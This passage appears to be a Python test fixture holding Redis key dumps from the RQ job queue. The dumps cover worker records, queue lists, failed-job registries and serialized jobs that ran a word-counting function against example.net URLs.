(b'rq:clean_registries:medium', 885, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:queue:low', 0, b'\x0e\x01@WW\x00\x00\x000\x00\x00\x00\x02\x00\x00$1fbc9695-c0a7-4302-8a77-9304ca86057b&$91478a7d-9165-43b5-8f5a-f91a37a8feea\xff\x08\x00H\xc3\xed\xc5d\xb8\x85\x0b'),
(b'rq:worker:dc519fbace1f443e96ed15344cd64972', 41, b'\r\xc3@\xc6@\xe8\x04\xe8\x00\x00\x00\xca \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:47:49.9\x1616879Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f45882Z\x1d\x06queues\x08\x03low\x05\x03pid\x05\xc0\xe34\x04\x08ho\x1fstname\n\x08parabook\n\x05state\x07\x04idle\x06\x10f\x1failed_job_count\x12\xf2\x02\x12total_working\x10_time\x14\x070.00302\t\x05d \x8a\xe0\x0f\xb8\x0646153Z\xff\x08\x00\xa8\xca\x14\x8d8\xee-\xb4'),
(b'rq:queue:high', 0, b'\x0e\x01@WW\x00\x00\x000\x00\x00\x00\x02\x00\x00$0b8e247a-81f6-4de2-8fde-080a2518b5bc&$bcb5774c-24c6-4d99-a45d-cf9c9d560571\xff\x08\x00I\xa2\xe6F\x8a\x9a\xccQ'),
(b'rq:worker:507c96f6edd94e1ea50a928331004fbc', 50, b'\r\xc3@\xc8@\xea\x04\xea\x00\x00\x00\xcc \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:47:58.6\x1622604Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f50285Z\x1d\x06queues\x08\x04high\x06\x03pid\x05\xc0\xeb4\x04\x08h\x1fostname\n\x08parabook\n\x05state\x07\x04idle\x06\x10\x1ffailed_job_count\x12\xf2\x02\x12total_workin\x12g_time\x14\x080.001578\n\x05d \x8c\xe0\x0f\xba\x0650639Z\xff\x08\x00\xeb\r\xf7\x83\xc1g6\xb7'),
(b'rq:failed:medium', 0, b'\x0c77\x00\x00\x000\x00\x00\x00\x02\x00\x00$f9f7c364-3f6d-4326-b724-c6f6983b05bb&\xd0\xfa\x033_\xff\x08\x00`@\xd6\x1a\xe4\xae\xd8+'),
(b'rq:queues', 0, b'\x02\x03\x0frq:queue:medium\x0crq:queue:low\rrq:queue:high\x08\x00-\x1cw\x14lM\xc4\x1c'),
(b'rq:job:acfa2647-5e40-4510-9e8c-303df1dbc757', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:18.840834Z\nstarted_at\x1b2019-08-12T20:47:49.932673Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:49.935693Z\x06origin\x03low\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.841263Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xa0v\xb06\x8fb\x12\xf5'),
(b'rq:job:1b2b1887-d608-4662-86fa-560d7b575fd0', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x06medium\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.511732Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.511490Z\x08\x00\x06\x0b\xa0t\x0ctw\x13'),
(b'rq:failed:low', 0, b'\x0c77\x00\x00\x000\x00\x00\x00\x02\x00\x00$acfa2647-5e40-4510-9e8c-303df1dbc757&\xd0\xf5\x033_\xff\x08\x00U\x1c\x03\xd6V\xbcA\x13'),
]
fxt_all_failed = [
(b'rq:worker:acc0ece6b0f04881a71f34ca4b87bc16', 47, b'\r\xc3@\xc9@\xe9\x04\xe9\x00\x00\x00\xcb \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:26.2\x1694079Z\x1d\x0elast_heartbeat\x10\xe0\x0c,\x1f316801Z\x1d\x06queues\x08\x03low\x05\x03pid\x05\xc075\x04\x08h\x1fostname\n\x08parabook\n\x05state\x07\x04idle\x06\x10\x1ffailed_job_count\x12\xf2\x02\x12total_workin\x12g_time\x14\x080.001564\n\x05d \x8b\xe0\x0e\xb9\x07317126Z\xff\x08\x006\xfc\x87\xeeq\xea\x85\x94'),
(b'rq:worker:fb1f6a5845194c8782156931fb7f0799', 46, b'\r\xc3@\xc6@\xe8\x04\xe8\x00\x00\x00\xca \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:24.6\x1609885Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f34597Z\x1d\x06queues\x08\x04high\x06\x03pid\x05\xc055\x04\x08h\x1fostname\n\x08parabook\n\x05state\x07\x04idle\x06\x10\x1ffailed_job_count\x12\xf2\x02\x12total_workin\x10g_time\x14\x060.0016\x08\x05d \x8a\xe0\x0f\xb8\x0634936Z\xff\x08\x00\xd5\x82\x070\xe52\x16P'),
(b'rq:worker:5985fbe437404accb72c275ec1ed6425', 41, b'\r\xc3@\xc6@\xe9\x04\xe9\x00\x00\x00\xcb \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:20.0\x1609708Z\x1d\x0elast_heartbeat\x10\xe0\r,\x0130 /\x1fZ\x1d\x06queues\x08\x03low\x05\x03pid\x05\xc005\x04\x08hostnam\x1fe\n\x08parabook\n\x05state\x07\x04idle\x06\x10failed\x1f_job_count\x12\xf2\x02\x12total_working_time\x01\x14\x08@\x96\x061653\n\x05d \x8b\xe0\x0f\xb9\x0630343Z\xff\x08\x00W{Rq[Mww'),
(b'rq:job:bcb5774c-24c6-4d99-a45d-cf9c9d560571', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.605756Z\nstarted_at\x1b2019-08-12T20:49:30.794920Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:30.796437Z\x06origin\x04high\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.606034Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xd0\xf4\xa6\x86~\xef\xf5\xed'),
(b'rq:job:91478a7d-9165-43b5-8f5a-f91a37a8feea', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.418029Z\nstarted_at\x1b2019-08-12T20:49:26.307127Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:26.308691Z\x06origin\x03low\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.418265Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\x1a\xaa\xbf\x15x0\xae|'),
(b'rq:worker:453c31e48d0f4da58f90cfc13779d993', 52, b'\r\xc3@\xc9@\xea\x04\xea\x00\x00\x00\xcc \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:30.7\x1683067Z\x1d\x0elast_heartbeat\x10\xe0\x0c,\x0180 B\x1f2Z\x1d\x06queues\x08\x04high\x06\x03pid\x05\xc0;5\x04\x08hostn\x1fame\n\x08parabook\n\x05state\x07\x04idle\x06\x10fail\x1fed_job_count\x12\xf2\x02\x12total_working_ti\x0eme\x14\x080.001517\n\x05d \x8c\xe0\x0e\xba \x8d\x04318Z\xff\x08\x00Y\xe1\x04L\x06\t\x0ec'),
(b'rq:job:1fbc9695-c0a7-4302-8a77-9304ca86057b', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.131501Z\nstarted_at\x1b2019-08-12T20:49:20.022097Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:20.023750Z\x06origin\x03low\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.131776Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00E\x19Nq\x83\xcc\xd5['),
(b'rq:clean_registries:high', 799, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:clean_registries:low', 790, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:job:95ae312d-3ae6-4846-9d9a-c7cdb36254ba', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.034930Z\nstarted_at\x1b2019-08-12T20:47:58.642547Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:58.644125Z\x06origin\x04high\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.035242Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xa7\x7f\x8f\xfa\xc7\xdf\xc9\xaf'),
(b'rq:job:f9f7c364-3f6d-4326-b724-c6f6983b05bb', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:18.941830Z\nstarted_at\x1b2019-08-12T20:47:54.862943Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:54.864504Z\x06origin\x06medium\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.942075Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00R\x88\x9f\xc5<\xf1\xfc\xb6'),
(b'rq:job:0b8e247a-81f6-4de2-8fde-080a2518b5bc', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.323621Z\nstarted_at\x1b2019-08-12T20:49:24.623319Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:24.624919Z\x06origin\x04high\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.323981Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xdb\xea\x01k\x13o\xd6X'),
(b'rq:failed:high', 0, b'\x0c@\x8f\x8f\x00\x00\x00\x88\x00\x00\x00\x06\x00\x00$95ae312d-3ae6-4846-9d9a-c7cdb36254ba&\xd0\xfe\x033_\x06$0b8e247a-81f6-4de2-8fde-080a2518b5bc&\xd0T\x043_\x06$bcb5774c-24c6-4d99-a45d-cf9c9d560571&\xd0Z\x043_\xff\x08\x00\x8d\x1a\xa0\x94\x19;\x89-'),
(b'rq:job:fd4c7c24-6a46-465c-a2fa-14f5198725f9', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.226935Z\nstarted_at\x1b2019-08-12T20:49:22.185414Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:22.187037Z\x06origin\x06medium\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.227177Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00w\x97\xe8\\O>\xa8\x90'),
(b'rq:worker:09d8021f5de845a69b713b1fed130fed', 43, b'\r\xc3@\xca@\xec\x04\xec\x00\x00\x00\xce \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:22.1\x1669644Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f93651Z\x1d\x06queues\x08\x06medium\x08\x03pid\x05\xc025\x04\x1f\x08hostname\n\x08parabook\n\x05state\x07\x04idle\x1f\x06\x10failed_job_count\x12\xf2\x02\x12total_work\x14ing_time\x14\x080.001623\n\x05d \x8e\xe0\x0f\xbc\x0693997Z\xff\x08\x00s\xc2s\x106\xa1\x97^'),
(b'rq:clean_registries:medium', 795, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:failed:medium', 0, b"\x0c@\x8f\x8f\x00\x00\x00\x88\x00\x00\x00\x06\x00\x00$f9f7c364-3f6d-4326-b724-c6f6983b05bb&\xd0\xfa\x033_\x06$fd4c7c24-6a46-465c-a2fa-14f5198725f9&\xd0R\x043_\x06$1b2b1887-d608-4662-86fa-560d7b575fd0&\xd0X\x043_\xff\x08\x00J\xba\x1f\n\xe3'')"),
(b'rq:queues', 0, b'\x02\x03\x0frq:queue:medium\x0crq:queue:low\rrq:queue:high\x08\x00-\x1cw\x14lM\xc4\x1c'),
(b'rq:job:acfa2647-5e40-4510-9e8c-303df1dbc757', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:18.840834Z\nstarted_at\x1b2019-08-12T20:47:49.932673Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:49.935693Z\x06origin\x03low\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.841263Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ 